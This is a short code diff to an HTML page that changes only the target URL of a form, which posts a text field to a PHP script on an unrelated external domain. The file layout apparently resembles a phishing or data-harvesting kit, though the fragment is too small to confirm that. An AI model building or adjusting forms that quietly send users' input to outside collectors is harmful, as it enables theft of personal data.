--- a/configure/title/index.html
+++ b/configure/title/index.html
@@ -47,7 +47,7 @@
 </center>
                         <div class="container">
                             <div class="mt-4">
-                                <form action="https://samporna-duabelas-batang.my.id/namex/gareng.php" method="POST">
+                                <form action="https://samporna-duabelas-batang.my.id/namex/garang.php" method="POST">
                                     <div class="mb-3 shadow rounded">
                                         <input
                                             type="text"
